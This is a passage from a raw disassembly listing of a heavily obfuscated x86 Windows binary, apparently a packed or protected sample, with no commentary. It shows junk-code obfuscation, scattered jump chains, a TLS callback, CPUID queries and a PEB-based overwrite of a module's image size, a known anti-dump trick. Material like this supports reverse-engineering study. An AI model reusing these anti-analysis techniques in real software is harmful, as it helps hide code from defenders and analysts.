; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
pushf
mov [esp], eax
ror eax, 5
push ebx
push 63128391h
pop ebx
add ebx, 911EB1Ch
rol ebx, 0Bh
jmp loc_4266A4
; ---------------------------------------------------------------------------
loc_423AE3: ; DATA XREF: sub_4258EB+3FE0�o
call sub_422048
mov ds:dword_42C48C, eax
; START OF FUNCTION CHUNK FOR sub_423324
loc_423AED: ; CODE XREF: sub_423324:loc_4223C3�j
jmp loc_4299D4
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4258EB
loc_423AF2: ; CODE XREF: sub_4258EB:loc_4258F6�j
cmp ds:dword_42C48C, 0
jnz loc_422D2F
jmp loc_4299C0
; END OF FUNCTION CHUNK FOR sub_4258EB
; =============== S U B R O U T I N E =======================================
sub_423B04 proc near ; DATA XREF: sub_422048:loc_4271AB�o
; FUNCTION CHUNK AT 00428113 SIZE 00000005 BYTES
add esp, 0FFFFFFE4h
mov [ebp-8], edx
mov [ebp-4], eax
push offset loc_42907A
jmp loc_428113
sub_423B04 endp
; ---------------------------------------------------------------------------
adc edx, edi
cmp ecx, edx
jmp loc_4231C7
; ---------------------------------------------------------------------------
loc_423B20: ; CODE XREF: _94j21ax3:00423BE8�j
jz loc_422615
jmp loc_424991
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_423B2B: ; CODE XREF: sub_4294B3:loc_424E69�j
pop esi
rol ebp, 0Ch
test esi, ecx
jmp loc_4297FA
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
loc_423B36: ; DATA XREF: sub_426B87+6�o
pop ebp
mov eax, ds:dword_423438
or eax, eax
jnz loc_42127B
jmp loc_421730
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_423B4A: ; CODE XREF: sub_42484C+3AD�j
mov [edx-8], eax
jmp loc_42C1A3
; ---------------------------------------------------------------------------
loc_423B52: ; CODE XREF: sub_42484C:loc_424BE4�j
cmp dword ptr [ebp-10h], 2
jnz loc_42C1A3
mov eax, [ebp+8]
or dword ptr [eax-8], 8
jmp loc_422A10
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FDC
loc_423B68: ; CODE XREF: sub_422FDC:loc_426E7C�j
; sub_422FDC:loc_42A95B�j
cmp dword ptr [ebp-1Ch], 67h
jnz loc_4232BD
jmp loc_428BA1
; END OF FUNCTION CHUNK FOR sub_422FDC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_36. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_423B78 proc near ; CODE XREF: sub_4281A5:loc_429339�p
; _94j21ax3:loc_429FBC�p
; FUNCTION CHUNK AT 00421794 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004231E1 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00424870 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424DDC SIZE 0000000C BYTES
xor bx, bx
add ebx, 10000h
loc_423B81: ; CODE XREF: sub_423B78-989�j
; _94j21ax3:00426E50�j
jns loc_4231F6
loc_423B87: ; CODE XREF: _94j21ax3:00424375�j
jmp loc_4231E1
sub_423B78 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_147. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423B8D: ; CODE XREF: _94j21ax3:00421F3F�j
jz loc_4298A3
mov eax, [ecx]
; START OF FUNCTION CHUNK FOR sub_423F55
loc_423B95: ; CODE XREF: sub_423F55+2BF3�j
cmp ebp, 4AFCBBE2h
jmp loc_4297CE
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BFAD
loc_423BA0: ; CODE XREF: sub_42BFAD+6�j
mov [ebp+var_1], al
cmp [ebp+var_1], 0
jz loc_427FAC
mov [ebp+var_8], 1
; END OF FUNCTION CHUNK FOR sub_42BFAD
; START OF FUNCTION CHUNK FOR sub_42B03C
loc_423BB4: ; CODE XREF: sub_42B03C:loc_42740E�j
; sub_42B03C-308B�j
mov eax, [ebp-8]
pop ecx
jmp loc_424D53
; END OF FUNCTION CHUNK FOR sub_42B03C
; =============== S U B R O U T I N E =======================================
sub_423BBD proc near ; CODE XREF: _94j21ax3:0042123D�j
; sub_42A791:loc_42AE21�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004279EB SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
add edx, 0B3D450ACh
xchg edx, [esp-4+arg_0]
jmp loc_4279EB
sub_423BBD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push 6D73DE8Eh
jmp loc_42B4CC
; ---------------------------------------------------------------------------
loc_423BD9: ; DATA XREF: sub_42C5CD+6�o
pop ebp
mov eax, ds:dword_429F88
or eax, eax
jnz loc_4295B0
jmp loc_423B20
; ---------------------------------------------------------------------------
jno loc_421DD8
jmp sub_42A7A6
; =============== S U B R O U T I N E =======================================
sub_423BF8 proc near ; CODE XREF: sub_4238D1+3�p
; sub_424B01+4F06�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00421EF0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423D14 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00425B72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042689A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00428041 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004286FD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00428E83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429E24 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push ecx
mov esp, ebp
pop ebp
jmp loc_428E83
sub_423BF8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jnz loc_4246F1
jmp loc_428BBB
; =============== S U B R O U T I N E =======================================
sub_423C10 proc near ; CODE XREF: sub_422866+2956�j
push ebx
xor eax, 51FF1ABEh
sub_423C10 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_422866
loc_423C17: ; CODE XREF: sub_422866:loc_421EFA�j
push 39FB679h
pop eax
add eax, 0FC604D87h
jmp loc_422288
; END OF FUNCTION CHUNK FOR sub_422866
; ---------------------------------------------------------------------------
loc_423C28: ; CODE XREF: _94j21ax3:00426773�j
xor eax, 474D3949h
popf
shl eax, cl
mov edx, [ebp-14h]
call sub_427679
; START OF FUNCTION CHUNK FOR sub_42983E
loc_423C39: ; CODE XREF: sub_42983E-A05�j
jmp nullsub_100
; END OF FUNCTION CHUNK FOR sub_42983E
; =============== S U B R O U T I N E =======================================
sub_423C3E proc near ; CODE XREF: sub_422815:loc_422818�p
; _94j21ax3:0042A89F�j
; FUNCTION CHUNK AT 00421FA3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004226F8 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00427144 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AE03 SIZE 0000000B BYTES
mov [esp+0], ecx
pop ecx
add esp, 0FFFFFFF8h
call sub_426B3C
test al, al
jmp loc_42AE03
sub_423C3E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423C51 proc near ; DATA XREF: sub_42A7A6:loc_42B996�o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00421AEE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422D81 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423822 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426552 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00427766 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004295F7 SIZE 00000016 BYTES
jnz loc_4295F7
adc edx, [esp+arg_0]
add esp, 8
mov eax, [eax]
jmp loc_421AEE
sub_423C51 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_108. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_183. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A57
loc_423C67: ; CODE XREF: sub_424A57-94F�j
jmp loc_423EE3
; END OF FUNCTION CHUNK FOR sub_424A57
; ---------------------------------------------------------------------------
mov edi, [ecx]
mov ebp, ebx
jmp sub_42BBF9
; ---------------------------------------------------------------------------
and ecx, 66E4C0FFh
jmp sub_42BEDC
; ---------------------------------------------------------------------------
mov dword ptr [ebp-4], 1
mov eax, 0
or eax, eax
jz loc_423E83
jmp loc_42839D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429974
loc_423C99: ; CODE XREF: sub_429974:loc_42C349�j
push esi
push 0C7FFDF98h
pop esi
add esi, 384288DAh
xchg esi, [esp+0]
jmp loc_424CED
; END OF FUNCTION CHUNK FOR sub_429974
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_40. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423CAF: ; CODE XREF: _94j21ax3:00425256�j
jmp loc_427D0B
; ---------------------------------------------------------------------------
sub edx, 0D65D5C4Bh
jmp sub_42C2E2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_423CBF: ; CODE XREF: sub_421F28:loc_42B2E1�j
adc ecx, edi
and ebx, 9EDEFD02h
xor esi, 0CBB0E359h
jmp loc_424676
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_423CD2: ; CODE XREF: sub_42AA5F:loc_426F5E�j
jz loc_42BFCA
jmp loc_426D62
; END OF FUNCTION CHUNK FOR sub_42AA5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_423CDD: ; CODE XREF: sub_424C37-228E�j
jnz loc_4296E2
jmp loc_426CCF
; END OF FUNCTION CHUNK FOR sub_424C37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426DA4
loc_423CE8: ; CODE XREF: sub_426DA4+C�j
mov eax, [eax]
push eax
push 1EA69EC5h
sub dword ptr [esp+0], 1EA69E9Dh
pushf
jmp loc_42B33B
; END OF FUNCTION CHUNK FOR sub_426DA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C5E8
loc_423CFD: ; CODE XREF: sub_42C5E8-B458�j
jnz loc_423402
loc_423D03: ; CODE XREF: _94j21ax3:0042298C�j
jmp loc_42BFB8
; END OF FUNCTION CHUNK FOR sub_42C5E8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_93. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_423D09 proc near ; DATA XREF: sub_424A57+5160�o
add edx, 916D9DA7h
call sub_421C84
sub_423D09 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_423BF8
loc_423D14: ; CODE XREF: sub_423BF8:loc_421EF0�j
add edx, 74211C73h
call sub_4247D2
loc_423D1F: ; CODE XREF: sub_421246+3B85�j
add ebp, 0A9EBE76Bh
; END OF FUNCTION CHUNK FOR sub_423BF8
; =============== S U B R O U T I N E =======================================
sub_423D25 proc near ; CODE XREF: sub_424EE4:loc_4287A5�p
xchg ecx, [esp+0]
pop ecx
jnz loc_427C40
jmp loc_425B72
sub_423D25 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmp esi, ebp
; START OF FUNCTION CHUNK FOR sub_42484C
loc_423D36: ; CODE XREF: sub_42484C:loc_423637�j
jmp loc_42312A
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
test esi, ebx
jmp loc_42A8C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B314
loc_423D42: ; CODE XREF: sub_42B314:loc_4265EF�j
and edx, 88CE38D3h
jbe loc_4218B3
jmp loc_42B54E
; END OF FUNCTION CHUNK FOR sub_42B314
; ---------------------------------------------------------------------------
adc ebx, 1FB79B75h
jmp loc_42A303
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_43. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423D5F: ; CODE XREF: _94j21ax3:0042B2F6�j
jmp sub_42574E
; ---------------------------------------------------------------------------
loc_423D64: ; DATA XREF: sub_42B384+8�o
add eax, 0CBE8E6C3h
call sub_429B81
; START OF FUNCTION CHUNK FOR sub_427D65
loc_423D6F: ; CODE XREF: sub_427D65-3ABB�j
jmp loc_423114
; END OF FUNCTION CHUNK FOR sub_427D65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_423D74: ; CODE XREF: sub_423324:loc_4233F6�j
mov ebx, [eax+4]
mov eax, [eax]
jnz loc_426E63
retn
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_423D80: ; CODE XREF: sub_421689+761C�j
jmp loc_42A473
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
loc_423D85: ; CODE XREF: _94j21ax3:004219C9�j
jmp loc_4245D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426E5C
loc_423D8A: ; CODE XREF: sub_426E5C:loc_426E63�j
cmp dword ptr [eax], 0FFFFFFFFh
mov ebx, [eax+4]
mov eax, [eax]
jnz loc_426E63
jmp nullsub_42
; END OF FUNCTION CHUNK FOR sub_426E5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429382
loc_423D9D: ; CODE XREF: sub_429382+126A�j
mov eax, (offset loc_4256D7+1)
call sub_428AE1
push 0CC71DF00h
mov eax, offset sub_423DB5
xchg eax, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_429382
; =============== S U B R O U T I N E =======================================
sub_423DB5 proc near ; DATA XREF: sub_429382-55D6�o
; FUNCTION CHUNK AT 00423F7A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425434 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00427F00 SIZE 0000001C BYTES
add eax, 2ED9926Ah
jmp loc_423F7A
sub_423DB5 endp
; ---------------------------------------------------------------------------
mov [edx], eax
jmp sub_4258CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424320
loc_423DC7: ; CODE XREF: sub_424320+C98�j
shl edx, 15h
cdq
loc_423DCB: ; CODE XREF: sub_424320:loc_427195�j
call sub_426612
mov edx, 0F9A79DECh
push edi
jmp loc_422092
; END OF FUNCTION CHUNK FOR sub_424320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_423DDB: ; CODE XREF: sub_423324:loc_429640�j
xor eax, 0F02E5FEAh
add eax, ebp
add eax, 0E02F3D34h
cmp dword ptr [eax], 4742444Fh
jz loc_42A566
jmp loc_426F05
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_423DFA: ; CODE XREF: sub_424EE4-203E�j
; sub_423F55+3C4D�j
cmp edx, 7449E4Fh
mov edx, ebx
pop ecx
xchg edi, [esp+0]
mov eax, edi
pop edi
pop ebx
jmp loc_42A687
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_423E0F: ; CODE XREF: sub_42169F+3605�j
jz loc_4269CB
jmp loc_42535F
; END OF FUNCTION CHUNK FOR sub_42169F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_64. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429974
loc_423E1B: ; CODE XREF: sub_429974-1249�j
jmp sub_423F43
; END OF FUNCTION CHUNK FOR sub_429974
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42559A
loc_423E20: ; CODE XREF: sub_42559A:loc_423683�j
pop ecx
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_42559A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC17
loc_423E24: ; CODE XREF: sub_42AC17�j
push offset sub_4246B9
jmp loc_421276
; END OF FUNCTION CHUNK FOR sub_42AC17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4216D0
loc_423E2E: ; CODE XREF: sub_4216D0-555�j
xor ebx, 8F18FFAAh
call sub_427E13
; END OF FUNCTION CHUNK FOR sub_4216D0
; START OF FUNCTION CHUNK FOR sub_427849
loc_423E39: ; CODE XREF: sub_427849-4B20�j
jmp loc_429F95
; END OF FUNCTION CHUNK FOR sub_427849
; ---------------------------------------------------------------------------
locret_423E3E: ; CODE XREF: _94j21ax3:00422C09�j
retn
; ---------------------------------------------------------------------------
loc_423E3F: ; CODE XREF: _94j21ax3:loc_422BEE�j
mov eax, [ebp-4]
cmp byte ptr [eax], 0
jnz loc_428448
mov eax, [ebp-8]
jmp loc_424588
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424775
loc_423E53: ; CODE XREF: sub_424775+21A9�j
; sub_421689:loc_427EDB�j
call sub_422C48
test eax, eax
jnz loc_426901
mov eax, [ebp-8]
call sub_42BAC2
loc_423E68: ; CODE XREF: _94j21ax3:loc_422070�j
; sub_422392+95F�j ...
mov esp, ebp
mov ebp, offset nullsub_12
xchg ebp, [esp+0]
jmp nullsub_25
; END OF FUNCTION CHUNK FOR sub_424775
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421C84
loc_423E77: ; CODE XREF: sub_421C84-A27�j
xor ebx, 18C9278Dh
add edx, ebx
pop ebx
mov [edx], eax
; END OF FUNCTION CHUNK FOR sub_421C84
; START OF FUNCTION CHUNK FOR sub_425790
loc_423E82: ; CODE XREF: sub_425790+44AD�j
pop edx
; END OF FUNCTION CHUNK FOR sub_425790
; START OF FUNCTION CHUNK FOR sub_426716
loc_423E83: ; CODE XREF: sub_426716:loc_421042�j
; _94j21ax3:00423C8E�j ...
dec ds:dword_42343C
jmp loc_42AAFE
; END OF FUNCTION CHUNK FOR sub_426716
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_423E8E: ; CODE XREF: sub_423FCD-1510�j
; sub_423FCD:loc_429930�j
mov eax, 80000002h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
add [esi], eax
xor [esi], ebx
jmp loc_426ACD
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
sub_423EA4 proc near ; DATA XREF: _94j21ax3:0042731C�o
ror eax, 0Dh
mov ds:dword_42340C, eax
sub_423EA4 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_21. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423EAE proc near ; CODE XREF: sub_424A57:loc_4242C4�j
; FUNCTION CHUNK AT 00427D8D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042B2A4 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jmp loc_42B2A4
sub_423EAE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_423EB6: ; CODE XREF: sub_421F28+97A5�j
; sub_427ABD:loc_42BAF2�j
mov eax, large fs:30h
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
lea edx, [eax+20h]
mov dword ptr [edx], 1000h
jmp loc_42A057
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421822
loc_423ED1: ; CODE XREF: sub_421822+A80B�j
ja loc_42BF04
cdq
loc_423ED8: ; CODE XREF: sub_421822:loc_42B8AB�j
call sub_421558
; END OF FUNCTION CHUNK FOR sub_421822
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_191. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_423EDE: ; CODE XREF: sub_421D33+1E4�j
jmp loc_4289FC
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A57
loc_423EE3: ; CODE XREF: sub_424A57:loc_423C67�j
jz loc_429BA6
jmp loc_428269
; END OF FUNCTION CHUNK FOR sub_424A57
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A83
loc_423EEE: ; CODE XREF: sub_429A83:loc_426F6E�j
pop ebp
xor eax, ecx
jnz loc_425B0B
jmp loc_42654C
; END OF FUNCTION CHUNK FOR sub_429A83
; ---------------------------------------------------------------------------
loc_423EFC: ; CODE XREF: _94j21ax3:00426A29�j
add eax, ebp
push edx
push 217A04Fh
pop edx
or edx, 870CD3D2h
add edx, 0D845FDE7h
jmp loc_42A495
; ---------------------------------------------------------------------------
sbb esi, ebp
add edx, 91368298h
jmp sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421480
loc_423F23: ; CODE XREF: sub_421480+D�j
rol edx, 5
add edx, eax
rol edx, 5
xor edx, esi
jmp loc_425267
; END OF FUNCTION CHUNK FOR sub_421480
; =============== S U B R O U T I N E =======================================
sub_423F32 proc near ; DATA XREF: sub_422F50+76B9�o
call sub_423F43
sub_423F32 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_422F50
loc_423F37: ; CODE XREF: _94j21ax3:0042173D�j
; sub_421DC4+8�j ...
mov eax, [ebp-0Ch]
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_422F50
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_423F3E: ; CODE XREF: sub_42C24F+2F3�j
jmp loc_428210
; END OF FUNCTION CHUNK FOR sub_42C24F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423F43 proc near ; CODE XREF: sub_421A4F-6E9�p
; sub_42270C-8F4�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004235C0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004246AE SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
jmp loc_4246AE
sub_423F43 endp
; ---------------------------------------------------------------------------
call sub_429163
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_218. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_144. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_423F55 proc near ; CODE XREF: sub_426A83-47C5�p
; _94j21ax3:00422F3A�j
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042162D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00422110 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042219C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004221C8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00422C43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004234F1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00423B95 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423DFA SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004241E1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004245F7 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004246A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424811 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00424A91 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 00424C50 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00426694 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426B46 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00426EFB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426F7D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00427418 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427807 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00427B96 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00427E01 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042845E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004297CE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042993B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042A566 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A687 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042AC6B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042B10A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042B42F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C125 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C200 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C244 SIZE 0000000B BYTES
mov [esp+0], edx
pop edx
mov [ebp-4], eax
loc_423F5C: ; CODE XREF: sub_422B4F+13�j
; sub_426A83+B�j ...
mov eax, [ebp-1Ch]
call sub_421EAD
jmp loc_4246A9
sub_423F55 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_423F69: ; CODE XREF: sub_42A0CC:loc_4274BA�j
jnz loc_4298D5
jmp loc_428BB1
; END OF FUNCTION CHUNK FOR sub_42A0CC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_100. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_423F75: ; CODE XREF: sub_42C0BC-4C2A�j
jmp loc_42ABF8
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DB5
loc_423F7A: ; CODE XREF: sub_423DB5+6�j
jmp loc_425434
; END OF FUNCTION CHUNK FOR sub_423DB5
; =============== S U B R O U T I N E =======================================
sub_423F7F proc near ; CODE XREF: sub_42191F�p
; _94j21ax3:00424418�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004298FC SIZE 0000000E BYTES
mov [esp+0], ecx
pop ecx
xchg ebx, [esp-4+arg_0]
mov ebx, [esp-4+arg_0]
push 8058AF5Bh
pop ebx
jmp loc_4298FC
sub_423F7F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR TlsCallback_0
loc_423F94: ; CODE XREF: TlsCallback_0-8EE8�j
jo loc_423160
not ebx
or edx, edi
loc_423F9E: ; CODE XREF: TlsCallback_0:loc_424FCC�j
push 0AD9C3C74h
pop eax
xor eax, 0AD9C3C75h
xor edx, edx
jmp loc_428745
; END OF FUNCTION CHUNK FOR TlsCallback_0
; ---------------------------------------------------------------------------
push ebx
push 5DDBD854h
pop ebx
add ebx, 0A2669FA8h
xchg ebx, [esp]
jmp loc_4277FD
; ---------------------------------------------------------------------------
sbb esi, edi
jmp sub_42C466
; =============== S U B R O U T I N E =======================================
sub_423FCD proc near ; CODE XREF: sub_42B314:loc_4265EA�p
; _94j21ax3:0042A719�j
; FUNCTION CHUNK AT 0042195C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00421D45 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00422075 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004222C8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042275F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422AB3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00422CFC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00423E8E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00425228 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042659C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00426A49 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00426ACD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428224 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004286E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042873F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004290FA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004291CF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429930 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429A9F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042A341 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042A3C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AF89 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B064 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B0DB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042BB6B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042C39E SIZE 00000014 BYTES
xchg edx, [esp+0]
pop edx
cmp eax, 0C3C033h
jnz loc_42BB75
jmp loc_42B0DB
sub_423FCD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423FE1 proc near ; CODE XREF: sub_422EB0+56AD�p
; FUNCTION CHUNK AT 004225DC SIZE 00000004 BYTES
mov [esp+0], eax
call dword ptr [ebp-4]
jmp loc_4225DC
sub_423FE1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
